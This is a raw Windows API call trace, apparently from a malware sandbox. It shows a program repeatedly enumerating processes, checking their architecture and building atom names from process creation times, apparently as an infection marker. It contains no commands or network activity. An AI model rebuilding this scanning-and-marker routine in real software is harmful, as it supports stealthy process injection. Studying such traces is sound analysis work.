	[0102.860] CloseHandle (hObject=0x690) returned 1
	[0102.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.860] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.860] CloseHandle (hObject=0x690) returned 1
	[0102.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.861] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.861] CloseHandle (hObject=0x690) returned 1
	[0102.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.903] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.903] CloseHandle (hObject=0x690) returned 1
	[0102.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.904] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.904] CloseHandle (hObject=0x690) returned 1
	[0102.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.904] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.904] CloseHandle (hObject=0x690) returned 1
	[0102.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.904] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.904] CloseHandle (hObject=0x690) returned 1
	[0102.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.905] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.905] CloseHandle (hObject=0x690) returned 1
	[0102.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.905] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.905] CloseHandle (hObject=0x690) returned 1
	[0102.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.905] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.905] CloseHandle (hObject=0x690) returned 1
	[0102.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.905] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.905] CloseHandle (hObject=0x690) returned 1
	[0102.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.906] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.906] CloseHandle (hObject=0x690) returned 1
	[0102.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.906] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.906] CloseHandle (hObject=0x690) returned 1
	[0102.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.906] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.906] CloseHandle (hObject=0x690) returned 1
	[0102.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.906] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.906] CloseHandle (hObject=0x690) returned 1
	[0102.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.906] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.907] CloseHandle (hObject=0x690) returned 1
	[0102.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.907] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.907] CloseHandle (hObject=0x690) returned 1
	[0102.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.907] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.907] CloseHandle (hObject=0x690) returned 1
	[0102.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.907] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.907] CloseHandle (hObject=0x690) returned 1
	[0102.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.907] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.907] CloseHandle (hObject=0x690) returned 1
	[0102.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.907] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.908] CloseHandle (hObject=0x690) returned 1
	[0102.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.908] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.908] CloseHandle (hObject=0x690) returned 1
	[0102.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.908] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.908] CloseHandle (hObject=0x690) returned 1
	[0102.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.908] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.908] CloseHandle (hObject=0x690) returned 1
	[0102.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.908] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.908] CloseHandle (hObject=0x690) returned 1
	[0102.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.909] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.909] CloseHandle (hObject=0x690) returned 1
	[0102.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.909] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.909] CloseHandle (hObject=0x690) returned 1
	[0102.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.909] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.909] CloseHandle (hObject=0x690) returned 1
	[0102.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.909] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.909] CloseHandle (hObject=0x690) returned 1
	[0102.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.910] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.910] CloseHandle (hObject=0x690) returned 1
	[0102.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.910] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.910] CloseHandle (hObject=0x690) returned 1
	[0102.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.910] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.910] CloseHandle (hObject=0x690) returned 1
	[0102.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.910] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.910] CloseHandle (hObject=0x690) returned 1
	[0102.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.910] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.910] CloseHandle (hObject=0x690) returned 1
	[0102.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.911] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.911] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.911] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.911] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.912] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.912] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.912] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.912] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0102.912] CloseHandle (hObject=0x690) returned 1
	[0102.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.913] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.913] CloseHandle (hObject=0x690) returned 1
	[0102.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.913] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.913] CloseHandle (hObject=0x690) returned 1
	[0102.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.963] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.963] CloseHandle (hObject=0x690) returned 1
	[0102.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.964] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.964] CloseHandle (hObject=0x690) returned 1
	[0102.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.964] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.964] CloseHandle (hObject=0x690) returned 1
	[0102.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.964] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.964] CloseHandle (hObject=0x690) returned 1
	[0102.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.964] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.964] CloseHandle (hObject=0x690) returned 1
	[0102.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.965] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.965] CloseHandle (hObject=0x690) returned 1
	[0102.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.965] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.965] CloseHandle (hObject=0x690) returned 1
	[0102.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.965] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.965] CloseHandle (hObject=0x690) returned 1
	[0102.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.965] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.965] CloseHandle (hObject=0x690) returned 1
	[0102.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.966] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.966] CloseHandle (hObject=0x690) returned 1
	[0102.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.966] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.966] CloseHandle (hObject=0x690) returned 1
	[0102.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.966] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.966] CloseHandle (hObject=0x690) returned 1
	[0102.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.966] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.966] CloseHandle (hObject=0x690) returned 1
	[0102.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.966] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.966] CloseHandle (hObject=0x690) returned 1
	[0102.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.967] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.967] CloseHandle (hObject=0x690) returned 1
	[0102.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.967] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.967] CloseHandle (hObject=0x690) returned 1
	[0102.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.967] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.967] CloseHandle (hObject=0x690) returned 1
	[0102.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.967] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.967] CloseHandle (hObject=0x690) returned 1
	[0102.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.967] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.967] CloseHandle (hObject=0x690) returned 1
	[0102.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.968] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.968] CloseHandle (hObject=0x690) returned 1
	[0102.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.968] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.968] CloseHandle (hObject=0x690) returned 1
	[0102.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.968] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.968] CloseHandle (hObject=0x690) returned 1
	[0102.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.968] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.968] CloseHandle (hObject=0x690) returned 1
	[0102.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.968] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.969] CloseHandle (hObject=0x690) returned 1
	[0102.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.969] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.969] CloseHandle (hObject=0x690) returned 1
	[0102.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.969] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.969] CloseHandle (hObject=0x690) returned 1
	[0102.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.969] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.969] CloseHandle (hObject=0x690) returned 1
	[0102.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.969] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.969] CloseHandle (hObject=0x690) returned 1
	[0102.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.970] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.970] CloseHandle (hObject=0x690) returned 1
	[0102.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.970] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.970] CloseHandle (hObject=0x690) returned 1
	[0102.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.970] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.970] CloseHandle (hObject=0x690) returned 1
	[0102.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.971] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.971] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.971] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.971] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.971] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.973] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.973] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.973] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.973] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.973] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0102.973] CloseHandle (hObject=0x690) returned 1
	[0102.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.974] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.974] CloseHandle (hObject=0x690) returned 1
	[0102.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.974] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.974] CloseHandle (hObject=0x690) returned 1
	[0103.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
